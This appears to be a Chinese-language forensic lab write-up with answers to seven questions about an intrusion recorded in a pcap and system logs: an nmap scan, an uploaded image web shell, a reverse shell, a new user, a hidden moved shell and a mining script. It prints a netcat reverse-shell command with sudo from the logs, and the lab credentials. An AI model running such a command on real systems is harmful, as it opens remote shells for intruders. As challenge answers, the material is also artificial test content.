PS:杰克創建在流量包(result.pcap)在根目錄下,請根據已有信息進行分析
1、攻擊者使用的端口掃描工具是?
2、通過流量及日志審計,攻擊者上傳shell的時訪問web使用IP地址是多少?
3、審計流量日志,攻擊者反彈shell的地址及端口?
4、攻擊者使用的提權方式及工具是什么?
5、攻擊者創建的新用戶名是?
6、攻擊者將shell刪除并放到了其他web目錄,文件名被改變了,找出它的絕對路徑及文件名
7、攻擊者使用新用戶留下了木馬進行不法行為,找出程序名,給出程序的絕對路徑
用戶名及密碼:security/P@ssw0rd,將/result.pcap文件下載下來:
1、攻擊者使用的端口掃描工具是?
過濾出http協議,看到User-Agent值出現了nmap關鍵詞:
答案:nmap
2、通過流量及日志審計,攻擊者上傳shell的時訪問web使用IP地址是多少?
Ctrl F搜索關鍵詞“upload”,看到上傳了admin.jpg并用“cmd”傳參來執行system()函數執行命令which nc:
答案:192.168.150.1
3、審計流量日志,攻擊者反彈shell的地址及端口?
繼續Ctrl F搜索關鍵詞“admin.jpg”,不斷查找,發現反彈shell信息:
答案:192.168.150.2:4444
4、攻擊者使用的提權方式及工具是什么?
執行命令journalctl _COMM=sudo > sudo.txt,使用systemd的系統查看sudo命令的歷史,保存為sudo.txt文件:
打開搜索關鍵詞“192.168.150.2”發現都有8888端口和nc命令:
答案:sudo nc -e /bin/bash 192.168.150.2 8888
5、攻擊者創建的新用戶名是?
打開虛擬機就能發現有別的用戶“securityy”:
也可以通過命令“cat /etc/passwd”列出系統上的所有用戶賬號:
一樣能看出有個securityy用戶
答案:securityy
6、攻擊者將shell刪除并放到了其他web目錄,文件名被改變了,找出它的絕對路徑及文件名
繼續在sudo.txt中查找關鍵詞“mv”,發現securityy用戶在/var/www/blog目錄下創建了.ShEllHAha目錄,并且將原本的shell從../html/uploads/admin.jpg移動到./.ShEllHAha/.hackba.php
答案:/var/www/blog/.ShEllHAha/.hackba.php
7、攻擊者使用新用戶留下了木馬進行不法行為,找出程序名,給出程序的絕對路徑
在第六問中,往下看剛好能看到有個Wakuang.sh(諧音挖礦)關鍵詞,發現securityy用戶在/opt目錄下創建了.Qwert目錄并創建了.Wakuang.sh文件:
答案:/opt/.Qwert/.Wakuang.sh